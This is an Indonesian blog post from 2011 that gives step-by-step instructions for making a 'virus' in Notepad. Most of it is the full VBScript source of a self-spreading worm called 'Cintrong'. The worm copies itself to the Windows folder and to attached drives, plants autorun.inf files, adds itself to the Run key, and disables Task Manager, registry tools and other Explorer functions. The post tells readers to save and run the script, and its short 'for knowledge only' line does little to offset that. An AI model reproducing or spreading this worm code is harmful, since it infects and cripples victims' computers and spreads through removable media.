Hosting Gratis

Web Hosting

Tuesday, 25 October 2011

Membuat Virus Dengan Notepad


Bukan hal yang aneh lagi jika notepad bisa dijadikan editor untuk membuat virus, virus yang dibuat di notepad cukup sederhana tapi mempunyai efek yang lumayan juga bila komputer kita terkena virus-virus dengan editor notepad. Posting ini diharapkan hanya untuk pengetahuan saja, bagaimana sebuah aplikasi notepade bisa dijadikan editor dalam membuat sebuah sebuah virus. Nah untuk mencobanya silahkan copy kode dibawah ini :


on error resume next

dim rekur,windowpath,flashdrive,fs,mf,isi,tf,cintrong,nt,check,sd

isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe cinta.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- cinta.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- cinta.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- cinta.dll.vbs ")
tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

set tf=fs.getfile(flashdrive.path &"\cinta.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\cinta.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\cinta.dll.vbs ")
tf.attributes = 39

set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next


set cintrong = createobject("WScript.Shell")

cintrong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE CINTRONG v.s. ZAY "

cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

cintrong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

cintrong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Cintrong. Variant from Rangga-Zay, don’t panic all data are safe."

cintrong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- cinta.dll.vbs "

cintrong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
cintrong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Cintrong"

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

setelah di copy di notepade simpan dengan cara klik save as type pilih “All Files (*.*). Simpan dengan nama : cinta.dll.vbs.
Sedikit penjelasan virus ini akan langsung menginfeksi komputer tanpa menungu pengguna menjalankan infector-nya.

(sumber : http://www.ernswebkom.co.cc)

No comments:

Post a Comment